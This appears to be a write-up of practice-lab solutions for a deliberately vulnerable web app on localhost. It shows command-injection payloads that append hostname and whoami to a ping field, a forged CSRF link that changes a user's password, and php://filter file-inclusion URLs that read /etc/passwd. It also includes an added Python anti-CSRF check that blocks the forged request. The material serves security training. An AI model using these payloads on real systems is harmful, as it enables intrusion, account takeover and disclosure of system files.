Command Injection

Objective

Remotely, find out the user of the web service on the OS, as well as the machine's hostname, via RCE.

127.0.0.1&hostname

PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.032 ms
db2bbb690ca3
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.031 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.038 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.031/0.034/0.038/0.000 ms

127.0.0.1&whoami

PING 127.0.0.1 (127.0.0.1): 56 data bytes
www-data
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.031 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.057 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.027/0.037/0.057/0.000 ms

CSRF

Objective

Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.

Definition

The aim of this attack is to deliver to an authenticated user a forged HTTP request that points to an internal action of the site, so that they execute it without being aware of it and with their own privileges.

URL: localhost/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change
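A server-side check that refuses the forged request above, as an added example that is not part of the original page or of the application's own code. It is written in Python rather than the application's PHP, and `issue_token`, `check_password_change`, the `csrf_token` field and the session ids are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed per-process secret; a real application keeps a stable server-side key.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Anti-CSRF token placed in the genuine password form, bound to one session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_password_change(method: str, url: str, session_id: str,
                          body: Optional[dict] = None) -> tuple:
    """Return (accepted, reason) for a password-change request (hypothetical handler)."""
    if method != "POST":
        return False, "state change refused over GET"
    if parse_qs(urlsplit(url).query):
        return False, "parameters must be sent in the body, not the URL"
    form = body or {}
    supplied = str(form.get("csrf_token", "")).encode()
    expected = issue_token(session_id).encode()
    # Constant-time comparison; a cross-site page cannot read the victim's token.
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid CSRF token"
    if not form.get("password_new") or form["password_new"] != form.get("password_conf"):
        return False, "passwords do not match"
    return True, "accepted"


def demo() -> list:
    """Run constructed requests through the check: the page's forged URL, then variants."""
    url = "http://localhost/vulnerabilities/csrf/"
    forged = url + "?password_new=password&password_conf=password&Change=Change"
    fields = {"password_new": "password", "password_conf": "password"}
    return [
        check_password_change("GET", forged, "victim-session"),
        check_password_change("POST", url, "victim-session", dict(fields)),
        check_password_change("POST", url, "victim-session",
                              dict(fields, csrf_token=issue_token("other-session"))),
        check_password_change("POST", url, "victim-session",
                              dict(fields, csrf_token=issue_token("victim-session"))),
    ]


if __name__ == "__main__":
    for accepted, reason in demo():
        print(accepted, reason)
```

Only the last constructed request, which carries the token issued to the same session, is accepted; the GET link, the token-less POST and the POST with another session's token are all refused.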

File Inclusion

Objective

Read all five famous quotes from /etc/passwd using only the file inclusion.

http://localhost/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=/etc/passwd

Or without base64:

http://localhost:8000/vulnerabilities/fi/?page=php://filter/resource=/etc/passwd